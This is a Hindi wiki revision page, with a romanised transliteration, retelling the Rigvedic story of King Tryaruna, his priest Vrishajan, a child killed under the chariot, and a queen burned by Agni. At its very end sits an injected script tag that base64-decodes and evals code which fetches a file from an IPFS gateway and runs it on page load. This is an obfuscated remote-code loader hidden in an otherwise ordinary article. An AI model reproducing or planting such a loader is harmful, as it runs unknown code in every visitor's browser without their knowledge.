Difference between revisions of "त्र्यरुण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
एक बार राजा त्र्यरुण को एक सारथी की आवश्यकता थी। उसके पुरोहित [[वृषजान]] ने घोड़ों की लगाम को थाम लिया। पुरोहित को सारथी के रूप में पाकर राजा '''रथारूढ़''' हुए। मार्ग में एक बालक आ गया। अथक प्रयत्न से भी वृषजान घोड़ों को रोक नहीं पाया तथा बालक रथ के पहिये से कुचलकर मारा गया। जनता इकट्ठी हो गई तथा वहाँ पर हाहाकार मच गया। पुरोहित ने अथर्वन् मंत्रों तथा 'वार्शसाम' स्तोत्र के द्वारा स्तवन किया। बालक पुन: जीवित हो उठा। विवाद शुरू हो चुका था, कि अपराधी कौन है-सारथी या फिर रथी? सबने निश्चय किया कि [[इक्ष्वाकु]] इसका निर्णय करेंगे। इक्ष्वाकु की व्यवस्था के अनुसार वृषजान को स्वदेश त्यागना पड़ा।
+
एक बार राजा त्र्यरुण को एक सारथी की आवश्यकता थी। उसके [[पुरोहित]] [[वृषजान]] ने घोड़ों की लगाम को थाम लिया। पुरोहित को सारथी के रूप में पाकर राजा '''रथारूढ़''' हुए। मार्ग में एक बालक आ गया। अथक प्रयत्न से भी वृषजान घोड़ों को रोक नहीं पाया तथा बालक रथ के पहिये से कुचलकर मारा गया। जनता इकट्ठी हो गई तथा वहाँ पर हाहाकार मच गया। पुरोहित ने [[अथर्वन]] मंत्रों तथा 'वार्शसाम' स्तोत्र के द्वारा स्तवन किया। बालक पुन: जीवित हो उठा। विवाद शुरू हो चुका था, कि अपराधी कौन है-सारथी या फिर रथी? सबने निश्चय किया कि [[इक्ष्वाकु]] इसका निर्णय करेंगे। इक्ष्वाकु की व्यवस्था के अनुसार वृषजान को स्वदेश त्यागना पड़ा।
प्रजा के सम्मुख विकट संकट उत्पन्न हो गया। अग्नि तापरहित हो गई। भोजन तैयार करना, दूध-पानी गरम करना असम्भव हो गया। प्रजा ने एकत्र होकर कहा कि पुरोहित को दंड देना अनुचित है। इक्ष्वाकु ने अपने वंशज (त्र्यरुण) के साथ पक्षपात करके पुरोहित को विदेश गमन की व्यवस्था दी है, इसी से अग्नि का ताप नष्ट हो गया। राजा पुरोहित के पास गये। उनसे क्षमा-याचना की और कहा, <blockquote>"पुरोहितवर, आपका धर्म क्षमादान है। मेरा दंडदान कीजिए व आप मुझे क्षमा कीजिए। मेरे कारण प्रजा को कष्ट पहुँचाना उचित नहीं है।"</blockquote> पुरोहित वृषजान ने राजा को क्षमा कर दिया तथा राज्य का पुरोहित पद पुन: स्वीकार कर लिया, किन्तु अग्नि का ताप अब भी नहीं लौटा। पुरोहित ने कहा कि वे कारण जान गये हैं। उन्होंने कहा कि रानी पिशाचिनी है। रानी को बुलाया गया। पुरोहित ने [[अग्निदेव]] का आहावान किया। रानी अत्यन्त मलिन, उदास थी। अग्नि देवता ने प्रकट होकर रानी को भस्म कर दिया। पाप की समाप्ति के साथ ही अग्नि का तेज़ और प्रकाश एक बार फिर से पुन: लौट आया।<ref>[[ऋग्वेद]]  5|2, 5|21</ref>
+
प्रजा के सम्मुख विकट संकट उत्पन्न हो गया। अग्नि तापरहित हो गई। भोजन तैयार करना, दूध-पानी गरम करना असम्भव हो गया। प्रजा ने एकत्र होकर कहा कि [[पुरोहित]] को दंड देना अनुचित है। इक्ष्वाकु ने अपने वंशज (त्र्यरुण) के साथ पक्षपात करके पुरोहित को विदेश गमन की व्यवस्था दी है, इसी से अग्नि का ताप नष्ट हो गया। राजा पुरोहित के पास गये। उनसे क्षमा-याचना की और कहा, <blockquote>"पुरोहितवर, आपका धर्म क्षमादान है। मेरा दंडदान कीजिए व आप मुझे क्षमा कीजिए। मेरे कारण प्रजा को कष्ट पहुँचाना उचित नहीं है।"</blockquote> पुरोहित वृषजान ने राजा को क्षमा कर दिया तथा राज्य का [[पुरोहित]] पद पुन: स्वीकार कर लिया, किन्तु अग्नि का ताप अब भी नहीं लौटा। पुरोहित ने कहा कि वे कारण जान गये हैं। उन्होंने कहा कि रानी पिशाचिनी है। रानी को बुलाया गया। पुरोहित ने [[अग्निदेव]] का आहावान किया। रानी अत्यन्त मलिन, उदास थी। अग्नि देवता ने प्रकट होकर रानी को भस्म कर दिया। पाप की समाप्ति के साथ ही अग्नि का तेज़ और प्रकाश एक बार फिर से पुन: लौट आया।<ref>[[ऋग्वेद]]  5|2, 5|21</ref>
 +
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 8: Line 9:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{कथा}}  
+
{{कथा}}
 
 
 
[[Category:कथा साहित्य]][[Category:कथा साहित्य कोश]] [[Category:पौराणिक कोश]]
 
[[Category:कथा साहित्य]][[Category:कथा साहित्य कोश]] [[Category:पौराणिक कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:25, 19 February 2014

ek bar raja tryarun ko ek sarathi ki avashyakata thi. usake purohit vrishajan ne gho doan ki lagam ko tham liya. purohit ko sarathi ke roop mean pakar raja ratharoodh hue. marg mean ek balak a gaya. athak prayatn se bhi vrishajan gho doan ko rok nahian paya tatha balak rath ke pahiye se kuchalakar mara gaya. janata ikatthi ho gee tatha vahaan par hahakar mach gaya. purohit ne atharvan mantroan tatha 'varshasam' stotr ke dvara stavan kiya. balak pun: jivit ho utha. vivad shuroo ho chuka tha, ki aparadhi kaun hai-sarathi ya phir rathi? sabane nishchay kiya ki ikshvaku isaka nirnay kareange. ikshvaku ki vyavastha ke anusar vrishajan ko svadesh tyagana p da.

praja ke sammukh vikat sankat utpann ho gaya. agni taparahit ho gee. bhojan taiyar karana, doodh-pani garam karana asambhav ho gaya. praja ne ekatr hokar kaha ki purohit ko dand dena anuchit hai. ikshvaku ne apane vanshaj (tryarun) ke sath pakshapat karake purohit ko videsh gaman ki vyavastha di hai, isi se agni ka tap nasht ho gaya. raja purohit ke pas gaye. unase kshama-yachana ki aur kaha,

"purohitavar, apaka dharm kshamadan hai. mera dandadan kijie v ap mujhe kshama kijie. mere karan praja ko kasht pahuanchana uchit nahian hai."

purohit vrishajan ne raja ko kshama kar diya tatha rajy ka purohit pad pun: svikar kar liya, kintu agni ka tap ab bhi nahian lauta. purohit ne kaha ki ve karan jan gaye haian. unhoanne kaha ki rani pishachini hai. rani ko bulaya gaya. purohit ne agnidev ka ahavan kiya. rani atyant malin, udas thi. agni devata ne prakat hokar rani ko bhasm kar diya. pap ki samapti ke sath hi agni ka tez aur prakash ek bar phir se pun: laut aya.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. rrigved 5|2, 5|21

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>